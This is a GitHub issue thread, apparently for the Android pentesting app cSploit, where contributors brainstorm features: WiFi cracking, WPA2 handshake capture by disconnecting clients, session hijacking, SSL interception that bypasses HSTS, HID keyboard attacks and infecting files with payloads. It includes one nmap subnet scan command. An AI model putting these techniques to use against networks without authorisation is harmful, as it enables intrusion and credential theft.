Closed ETeissonniere closed 7 years ago
Dayum if that could be in csploit. ... dayum
I can enable wifi cracking but it will need a patched android kernel.. To compile you can use the AIDE app. I do not know what dayum is Le 4 sept. 2015 17:26, "Tajnymag" notifications@github.com a écrit :
- wifi cracking using USB card (workaround for any driver issue)
- on-device compiling of the newest cSploit code
- Router Keygen integration (the same range of supported routers)
- quick test for default credentials used in selected router's administration page
- automatic reporting of crashes and errors (combined with some simple on-server averiging)
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-137766749.
By patching the android kernel you mean the mac80211 injection patch? Because Kali NetHunter has a guide on doing just that, so that everyone can patch and configure their own kernels. Integration wit Router Keygen seems kind of pointless, as modern devices have enough resources to switch between two apps. Some automation could be implemented, but will only cause issues in the long run. The default credentials and tabbed interface would be very usefull. "Dayum" is the over-pronounciation of "Damn".
@DomenlDruga, yeah, I was speaking about that patch, then thanks for the translation :smile: Le 5 sept. 2015 10:13, "DomenlDruga" notifications@github.com a écrit :
By patching the android kernel you mean the mac80211 injection patch? Because Kali NetHunter has a guide https://github.com/offensive-security/kali-nethunter/wiki/Modifying-the-Kernel on doing just that, so that everyone can patch and configure their own kernels. Integration wit Router Keygen seems kind of pointless, as modern devices have enough resources to switch between two apps. Some automation could be implemented, but will only cause issues in the long run. The default credentials and tabbed interface would be very usefull. "Dayum" is the over-pronounciation of "Damn".
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-137928396.
Metasploit Extra Console for Testing MSF Features, that arent currently included in the app. This could help to use exploits before they are even implented, and would help in research to make csploit features bigger.
But this is just optional. The main thing I want to get with this is: More features
Of course.
Hi,
Anyway, I´m not sure if it happens only on my mobile (htc bravo 4.4.4), but there are a lot of problems with the latest apk/sources.
For name a few:
Has anyone seen these problems? I think I could fix some of them.
@ga, I think we could try something like an OSINT tool. Now some news: I found android pcap, an app which allow you to have a kismet like tool with an external wifi card (without root), I will try to use the sources for wifi cracking functionnality Le 8 sept. 2015 12:04, "ga" notifications@github.com a écrit :
Hi,
- I´d like to have a complete suite for domain/subdomain analysis/discovery. Using dnsmap, dnsenum, fierce, whois, google (well, search.disconnect.me), etc... I think it would be easy to implement.
- dns spoofing using ettercap: I have it already implemented and working.
Anyway, I´m not sure if it happens only on my mobile (htc bravo 4.4.4), but there are a lot of problems with the latest apk/sources.
For name a few:
- login cracker not working (hydra segfault). This binary works fine: http://forum.xda-developers.com/showthread.php?t=2064605 but someone should compile the binary from the sources.
- passwordSniffer not intercepting SSL traffic (disabled by code: I´ve enabled it but the HTTPSredirector throws several SSLException when intercepting connections). Does anyone know why is it disabled? We could just use the ettercap plugin sslstrip, but it throws and error complaining about a cookie regex.
- network subnet does not always appear on the network list
- if when stopping the sniffer it exits with signal 11, cSploit displays an error and exits. I think it should not exit from cSploit, since the sniffer has already died and you can launch it again.
Has anyone seen these problems? I think I could fix some of them.
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-138502853.
Funny you should mention android-pcap. I was just playing with it yesterday, got it building w/gradle + the new tools in Android Studio. FWIW, the play store listing says that it's GPL, but I didn't see a notice about what version in the actual source code.
Anyway, right now it only supports a few usb network adapters specifically the rtl8187 card. More specifically:
Unfortunately I don't have one of these :/ But anyway, to build with android studio and the newest SDK, you just need to change a few things:
It would be nice to see support for other chipsets in there, but would have to create more UsbSource.java-type classes for each one, and they're not small. But I haven't looked into it or more than 3 minutes.
If anyone can get Kismet Wireless to post which version of the GPL this uses, that would be great. Their other tools, particularly the cloudshark uploader, look interesting too.
ft
@Fattire thanks, will have a look. @tux-mind I will start working on all of that if you agree. Le 8 sept. 2015 17:47, "Fattire" notifications@github.com a écrit :
Funny you should mention android-pcap https://kismetwireless.net/gitweb/?p=android-pcap.git;a=summary. I was just playing with it yesterday, got it building w/gradle + the new tools in Android Studio. FWIW, the play store listing https://play.google.com/store/apps/details?id=net.kismetwireless.android.pcapcapture says that it's GPL, but I didn't see a notice about what version in the actual source code.
Anyway, right now it only supports a few usb network adapters https://kismetwireless.net/gitweb/?p=android-pcap.git;a=blob;f=src/net/kismetwireless/android/pcapcapture/Rtl8187Card.java;h=b8e1a44bb3a32376876ae1ff169634d1355ad568;hb=HEAD specifically the rtl8187 card. More specifically:
- Alfa AWUS036H, LevelOne WNC-0301USB v5, LevelOne WNC-0305USB (0x0bda:0x8187)
- AirLive WL-1600USB (0x1b75:0x8187)
- NETGEAR WG111v2 (0x0846:0x6a00)
- NETGEAR WG111v3 (0x0846:0x4260)
Unfortunately I don't have one of these :/ But anyway, to build with android studio and the newest SDK, you just need to change a few things:
1.
in src/net/kismetwireless/android/pcapcapture/PcapService.java https://kismetwireless.net/gitweb/?p=android-pcap.git;a=blob;f=src/net/kismetwireless/android/pcapcapture/PcapService.java;h=9416200b7a087c4422587e1e21489152ca8a6ce8;hb=HEAD use a NotificationCompat.Builder instead of the deprecated notification.setLatestEventInfo(). 2.
use this build.gradle https://gist.github.com/fat-tire/8f2546e623e019c7513d. I cleaned it up (took out signingConfigs section just because I didn't have a key to point to) slightly from what I was using to build, but it should work w/o much effort. 3.
remove libs/android-support-v4.jar 4.
remove the versionCode/versionName and uses-sdk lines in AndroidManifest.xml
It would be nice to see support for other chipsets in there, but would have to create more UsbSource.java-type classes for each one, and they're not small. But I haven't looked into it or more than 3 minutes.
If anyone can get Kismet Wireless to post which version of the GPL this uses, that would be great. Their other tools https://play.google.com/store/apps/developer?id=Kismet+Wireless, particularly the cloudshark uploader, look interesting too.
ft
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-138605592.
My idea is to have cSploit able to run also on a LAN interface. For example on my nethunter pad I have USB OTG cable connected to an USB LAN interface. Currently I can only use csploit with WLAN.
Is it possible to implement a WPA2-PSK hash sniffer? The script would forcefully disconnect clients and then monitor the traffic for the handshake (which can later be cracked using PC). Thoughts ?
I might try... For the moment, I am trying to add wifi external cards functionnality, and optimize the app. Le 10 sept. 2015 18:49, "NoBody112" notifications@github.com a écrit :
Is it possible to implement a WPA2-PSK hash sniffer? The script would forcefully disconnect clients and then monitor the traffic for the handshake (which can later be cracked using PC). Thoughts ?
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-139307425.
@sorano, would you mind to add a new issue with your suggestion? I've got a patch which allows you to select a configured network interface, in case of no wireless interface available. I've tested it with just the mobile gms interface, and works fine.
Right now cSploit relies a lot on the wireless dhcp information to work properly, so for example, if you configure the mobile to work as hostspot, the dhcp information is not available and we can not use cSploit. From the command line ettercap works perfectly on this case.
@gainan Done. https://github.com/cSploit/android/issues/240
I love the idea of running cSploit on the GSM interface.
@gainan, good, maybe you can do a pull request....
There should really be a HID (human interface device) attack so you could connect your cellphone on a pc and it would be detected as a keyboard and start typing programmed commands, just like Net Hunter (kali linux for android) and USB Rubber Ducky from Hak5. But I guess it would need to be able to do kernel changes for that... but anyways I think it would be possible to make some kind of automatic hack for when the cellphone is connected to a computer via USB (I remember there was an app that if I'm not wrong would automatically extract all saved passwords in a computer). Anyways, you understand my point, something that would work on USB :D .
How about quicker merging of pull requests? There are even some from February :D
Just to say that I am working on:
How about quicker merging of pull requests? There are even some from February :D
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-140449198.
Thanks @DeveloppSoft. Really looking forward to it :-)
Another idea:
OK, I understand, it's a very low priority, but wouldn't it be cool to have a wearable support?
Yeah, maybe. Le 19 sept. 2015 11:05, "Tajnymag" notifications@github.com a écrit :
OK, I understand, it's a very low priority, but wouldn't it be cool to have a wearable support?
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-141638799.
I've added a new wiki page with all the ideas we have contributed: https://github.com/cSploit/android/wiki/Ideas
If someone is working on any of these ideas, update the wiki with something like:
I'm not quite sure what "on-device compiling of the newest cSploit code" -- that sounds like the app compiles itself (?)
@Tajnymag what would wearable support look-like exactly? @DeveloppSoft I saw you stopped by IRC... come back! Wondering what you mean by 'changing the cSploit architecture"
@fat-tire I thought something like that. cSPloit would download latest code, compile a new apk, then prompt to install it. Tadaa, problem with nightly server is solved :smile:
On a wearable could be displayed a list of devices on ŮAN or available exploits. With RouterKeygen added, wearable could inform you about "crackable" network. As I said, it's a very low priority :-)
With nightly releases you have the option to test new features etc and might be less stable therefore I think nightly should be hosted on website and not downloaded directly in the app. Only stable releases should be (which it already does)
new idea: extend the session hijacker module functionality for:
@Fattire, I leave IRC because I was using my Wiko OZZY which was closing the page each time I was opening a new one. By "changing the code architecture" I mean: Have a cSploit android lib so the app is just the ui, it could be easier to use (one repo for the lib, an other for the app). Finally, I think time have come to launch cSploit 2.0 with a new ui and all the new functionnalities, but maybe I am wrong. Will come soon in IRC. Le 21 sept. 2015 00:27, "ga" notifications@github.com a écrit :
new idea: extend the session hijacker module functionality for:
- allow to detect users/pass fields on the URL.
- save not only the root domain of a cookie, but also all the pages the user is visiting within a URL.
- intercept not only web sites with cookies, but also without them
- allow to select which SSL cert to use.
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-141841532.
new idea:
Suggestion from @Avamander #69 Could you please add ping tool to the list of tools?
Suggestion from @cycroja #212
Please let the app work without Wlan (This will be possible when #245 gets merged)
And maybe the MITM hitspot tethering option without internet.
Suggestion from @doringr #207
will csploit have the new sslstrip+ or sslstrip2 in a near future?
Suggestion from @uranium-waffles #185
On session stealing as soon as you fix the msf issue sometime soon I tried the stealer on my own amazon but it still asked for my password you should add the user name and password right next to the session kind of like zanti
I'll drop this in here even if it not high prio.
Suggestion from @BoBeR182 #112 Will this project be looking to be distributed by f-droid?
Suggestion from @Avamander
Inform that host is disconnected when launching modules. (e.g. on "gray" hosts) or when running a module and the host disconnects mid-run.
Could you please improve the error messages? Just saying "An error occured does not help" also, it should auto report the error and known error should be numbered.
ok, let me answer to some of your great suggestions guys.
personally I love unix philosophy: one program does one thing, and, hopefully, it do it good. so my first thought about RouterKeygen was to give a link to the store to download and use it.
BTW, i gave a look at the algorithms folder and I'm quite impressed of the number of WiFi AP that cSploit can reverse. that code has been written by evilsocket for dSploit.
what are your suggestions ? integrate missing algorithms that RouterKeygen support ?
as cSploit want to be a multi-platform pentesting suite I will have to port all these stuff into the core. I'll have to write a C program that do it.
it would be useful only when tracing public IPs, and cSploit mainly work on internal networks. so i think that this feature is quite useless.
btw a possible implementation is to:
there are 2 main problems for make it works:
I suggest to open the router webpage asking the user to find the model if not yet known. than we will open routerpassword and/or portforward to let the user find it.
crash reports are already working.
up to you.
absolutely! sadly a ConsoleView is not so quick to make, just give a look at TerminalEmulator project. we may expose a telnet bridge and use ConnectBot on local host.
yep, once we switch to botbrew will be quite easy to build these tools. search.disconnect.me sounds like a simple browser page to open :stuck_out_tongue_winking_eye:
requires botbrew
WiP.
solves #212
workflow:
requires botbrew to compile macchanger or ip2route
no sense.
I was joking, let me explain you @Tajnymag . on your phone there isn't the tools required to compile an apk, thus the nightly must be compiled somewhere else.
we can develop a remote control app for cSploit ( thus to let you walk around while looking your watch for routers with known key algorithms ). I think that the notification is too boring. I find the default "notify when an open wifi is found" settings is very boring, don't you agree ?
Many functions of the MitM module must be moved into the core. a draft of the new proxy has been written here.
the most important feature IMHO is to use SSL Split instead of SSL Strip, it can bypass HSTS and the end user will se a waning, not an SSL error.
solves #207
this is what I'm trying to do by moving all the big functions into the core.
but we cannot move everything into the core. please suggest some concrete example so we can discuss it.
do you mean running those tools agains all knows targets, right ?
will be merged into complete suite for domain/subdomain analysis/discovery
yep.
requires botbrew
ok, low prio.
hem.. yes, someone will take care of this :smile:
port scanner/inspector on whole net yes, select the subnet and allow to scan it, like nmap -sS -P0 192.168.1.0/24
complete suite for domain/subdomain analysis/discovery I mean to use some webs to extract more info, aka google dorks (site:xx inurl:xx ...) :)
Allow to select any network interface available on the system. Will you do it? Up to you, if you want I can adapt it to the latest changes, or feel free to start it from scratch ^^
new idea:
since the service inspector and login cracker depends on a previous port scan, when finish the port scan display 2 buttons: [service inspector] [login cracker]
Bluetooth hacking:
new idea:
since the service inspector and login cracker depends on a previous port scan, when finish the port scan display 2 buttons: [service inspector] [login cracker]
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-143417989.
Is it possible to run msfconsole in Csploit to create exploits? Sorry for bad english .
Something like port of Metasploit . Sorry for spam .
@gainan google dorks sounds fine, but they are useful to find hidden resources on some webserver... I cannot understand how these stuff can be useful in an internal network. it's more related to a OSINT app then a penstesting one IMHO. nut maybe I'm wrong, pleasze show me how you suggest to use it :wink:
I'll test your pull request when I get home, there I have a TF201 with an USB port. as I said, that pull request must be merged :wink:
@DeveloppSoft I'm new to bluetooth hacking, however it sounds interesting. the social engineering feature it's cool, especially combined with the bluetooth hack. I can imagine that you can record a conversation that you triggered with a fake SMS.
also the ability ti infect any file with any payload it's simply awesome.
@DeveloppSoft about notbrew, how does it launch dynamically linked executables on android ?
does it play with the LD_LIBRARY_PATH
environment variable ?
thanks for your time :blush:
Idea : Csploit working in hotspot .
@tux-mind, here is the manual
guys, we've started converting all these suggestions into new issues, in order to let @tux-mind categorize and prioritize them. So if you have any new suggestion, check first the already opened issues and comment/contribute to that ones, and if it's not created add a new issue.
@gainan please lock this issue once all those great ideas has been converted to issues.
thanks to all for your interest and help :blush:
@DeveloppSoft, would you mind to add your suggestions in several issues? I think you can explain them better than me :)
@Megaeloelo, that feature will be possible when this pull request will be implemented: #245. However it'll need additional work, because AFAIK the tethering option inserts several iptables rules, and when csploit starts a new hijacker session it cleans up the iptables rules. We should detect if the wifi is working in master mode.
Hey guys, @ga, of course, just give me some time. @tux-mind, I hope my link was useful, if you want, you can contact me on my personnal email address (I think you can find it :smile:) Le 27 sept. 2015 22:20, "ga" notifications@github.com a écrit :
@DeveloppSoft https://github.com/DeveloppSoft, would you mind to add your suggestions in several issues? I think you can explain them better than me :)
@Megaeloelo https://github.com/Megaeloelo, that feature will be possible when this pull request will be implemented: #245 https://github.com/cSploit/android/pull/245. However it'll need additional work, because AFAIK the tethering option inserts
— Reply to this email directly or view it on GitHub https://github.com/cSploit/android/issues/229#issuecomment-143591960.
Hello guys, I opened that issue so you will be able to share some ideas concerning cSploit. Here is mine (working on it if @tux-mind thinks it clan be good):